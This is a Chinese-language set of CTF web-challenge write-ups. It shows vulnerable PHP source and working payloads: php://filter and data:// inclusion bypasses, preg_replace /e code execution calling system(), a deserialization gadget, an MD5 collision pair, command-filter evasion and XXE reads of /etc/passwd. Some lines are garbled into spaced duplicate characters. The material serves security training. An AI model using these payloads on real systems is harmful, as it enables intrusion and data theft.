[BJDCTF2020]ZJCTF，不过如此

<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php
    
}
else{
    highlight_file(__FILE__);
}
?>

传两个参数text和file，text要包含“I have a dream”，利用data://来绕过。

file=next.php不行，应该是里面有flag字段，所以利用php://filter 绕过第二个参数，用base64输出就不会匹配到了

payload：

?text=data://text/plain,I have a dream&file=php://filter/read/convert.base64-encode/resource=next.php

base64解一下

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

参考：https://www.cesafe.com/html/6999.html

payload：

\S*=${getFlag()}&cmd=system('cat /flag');

[BJDCTF2020]Mark loves cat

dirsearch发现git泄露

githack跑完


把flag文件内容赋给$flag

找到一个比较简单入手的地方

if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}

会输出 y d s ， 而 只 要 g e t 和 p o s t 不 给 f l a g 传 参 就 可 以 了 ， 我 们 只 需 要 让 yds，而只要get和post不给flag传参就可以了，我们只需要让 yds，而只要get和post不给flag传参就可以了，我们只需要让yds=$flag就可以了

而这段代码与$yds初始化之间隔了（后面的那个foreach并没有改变变量值）

foreach($_POST as $x => $y){
    $$x = $y;
}

foreach($_GET as $x => $y){
    $$x = $$y;
}

在这两个函数中要使得 y d s = yds= yds=flag

而$ x 可 以 理 解 为 x可以理解为 x可以理解为( x ) ， 所 以 直 接 g e t 传 值 y d s = f l a g ， 这 样 x)，所以直接get传值yds=flag，这样 x)，所以直接get传值yds=flag，这样x=yds， y = f l a g ， y=flag， y=flag，($x) = ( ( (y)就变成了 y d s = yds= yds=flag

payload1为

?yds=flag

看了别的师傅的wp发现了别的姿势

利用了exit($is)

if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);
}

要么post让flag=flag

但是在这里

foreach($_POST as $x => $y){
    $$x = $y;
}

x 为 f l a g ， x为flag， x为flag，y为flag，带进去$flag=flag，好，原来的flag被我们整没了，不行。

要么get让flag=flag

foreach($_GET as $x => $y){
    $$x = $$y;
}

x 为 f l a g ， x为flag， x为flag，y为flag，带进去 f l a g = flag= flag=flag，嗯，我等于我自己还是我自己，没问题

接下来考虑怎么让 i s = is= is=flag，直接传is=flag

所以payload2：

?flag=flag&is=flag

顺序无所谓

flag在源码里

[网鼎杯 2020 朱雀组]phpweb

抓包康康

这个函数和参数我们可以利用一下

利用file_get_contents获取index.php的源码

<?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    function gettime($func, $p) {
        $result = call_user_func($func, $p);
        $a= gettype($result);
        if ($a == "string") {
            return $result;
        } else {return "";}
    }
    class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }
    ?>

大致逻辑为，request两个参数func和p，func不能在黑名单里，然后执行gettime函数，返回字符串result，call_user_func把前一个传参作为一个函数，后一个传参作为这个要执行函数的参数，并返回执行结果。但是并没有用到Test这个类，于是想到了反序列化

<?php 
function gettime($func, $p) {
    $result = call_user_func($func, $p);
    $a= gettype($result);
    if ($a == "string") {
        return $result;
    } else {return "";}
}
class Test {
    var $p = "ls";
    var $func = "system";
    function __destruct() {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}
$a = new Test();

echo serialize($a);
 ?>

行得通

system(‘ls’) : 列举当前目录下的所有文件

system(“find / -name flag*”)：查找所有文件名匹配flag*的文件

system(“cat $(find / -name flag**)”)：**打印所有文件名匹配flag*的文件

flag在这/tmp/flagoefiu4r93

拿来吧你

[BSidesCF 2020]Had a bad day

发现index.php?category=woofers

伪协议尝试读取源码(发现不需要加后缀，因为后端会自己接上后缀的)

index.php?category=php://filter/read=convert.base64-encode/resource=index

base64解一下

             <?php
				$file = $_GET['category'];

				if(isset($file))
				{
					if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
						include ($file . '.php');
					}
					else{
						echo "Sorry, we currently only support woofers and meowers.";
					}
				}
				?>

文件包含，利用include特性/index.php?category=woofers/…/flag

确实有东西变了，但是怎么读取呢

瞟了别的师傅的wp0.0

利用php://filter伪协议可以套一层协议读取flag.php
/index.php?category=php://filter/convert.base64-encode/index/resource=flag
套一个字符index符合条件并且传入flag，读取flag.php

[安洵杯 2019]easy_web

注意到url中/index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=

img值经过两次base64解密和16进制转字符后得到555.png

逆推index.php得到TmprMlpUWTBOalUzT0RKbE56QTJPRGN3

<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd'])) 
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi～ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

?>
<html>
<style>
  body{
   background:url(./bj.png)  no-repeat center center;
   background-size:cover;
   background-attachment:fixed;
   background-color:#CCCCCC;
}
</style>
<body>
</body>
</html>

主要代码如下

if(preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

因为string把其转化为字符串，所以不能采用传数组的方式绕过

MD5强碰撞

a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

这里我弄了半天没出来，原来需要加一个字段

Content-Type:application/x-www-form-urlencoded

但是这玩意不应该是浏览器默认的吗？？？？为什么要我自己加呢？？？？？浪费我半天时间

再看上面的正则匹配

虽然过滤了ls但是可以用dir

没有，应该在根目录里，反斜杠绕过

ca\t 下行尾输\可以换行并且继续输入命令

看了下别的师傅的wp，这里还可以用sort，把每行按序输出，一样的

[NCTF2019]Fake XML cookbook

看题目，XXE注入，即XML External Entity，XML外部实体注入。通过 XML 实体，”SYSTEM”关键词导致 XML 解析器可以从本地文件或者远程 URI 中读取数据。所以攻击者可以通过 XML 实体传递自己构造的恶意值，是处理程序解析它。当引用外部实体时，通过构造恶意内容，可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。

构造攻击：

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///etc/passwd">
  ]>
<user><username>&admin;</username><password>123456</password></user>

尝试读取flag

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///flag">
  ]>
<user><username>&admin;</username><password>123456</password></user>

拿来吧你

参考：https://www.cnblogs.com/backlion/p/9302528.html